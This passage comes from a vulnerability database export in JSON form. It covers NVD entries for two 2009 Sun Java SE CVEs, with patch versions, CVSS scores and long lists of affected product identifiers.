JDK and JRE 6 Update 17 or later\r\n * JDK and JRE 5.0 Update 22 or later\r\n * SDK and JRE 1.4.2_24 or later\r\n\r\nJava SE releases are available at:\r\n\r\nJDK and JRE 6 Update 17:\r\n\r\n * http://java.sun.com/javase/downloads/index.jsp\r\n\r\nJRE 6 Update 17:\r\n\r\n * http://java.com/\r\n * Through the Java Update tool for Microsoft Windows users\r\n\r\nJDK 6 Update 17 for Solaris is available in the following patches:\r\n\r\n * Java SE 6: update 17 (as delivered in patch 125136-18)\r\n * Java SE 6: update 17 (as delivered in patch 125137-18 (64bit))\r\n * Java SE 6_x86: update 17 (as delivered in patch 125138-18)\r\n * Java SE 6_x86: update 17 (as delivered in patch 125139-18 (64bit))\r\n\r\nJDK and JRE 5.0 Update 22:\r\n\r\n * http://java.sun.com/javase/downloads/index_jdk5.jsp\r\n\r\nJDK 5.0 Update 22 for Solaris is available in the following patches:\r\n\r\n * J2SE 5.0: update 22 (as delivered in patch 118666-24)\r\n * J2SE 5.0: update 22 (as delivered in patch 118667-24 (64bit))\r\n * J2SE 5.0_x86: update 22 (as delivered in patch 118668-24)\r\n * J2SE 5.0_x86: update 22 (as delivered in patch 118669-24 (64bit))\r\n\r\nJava SE for Business releases are available at:\r\n\r\n * http://www.sun.com/software/javaseforbusiness/getit_download.jsp\r\n", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3874", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3874"], "modified": "2018-10-30T16:25:00", "cpe": 
["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", 
"cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3874", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Unspecified vulnerability in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to cause a denial of service (memory consumption) via crafted DER encoded data, which is not properly decoded by the ASN.1 DER input stream parser, aka Bug Id 6864911.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3876", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", 
"baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3876"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:sdk:1.4.2_23", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", 
"cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", 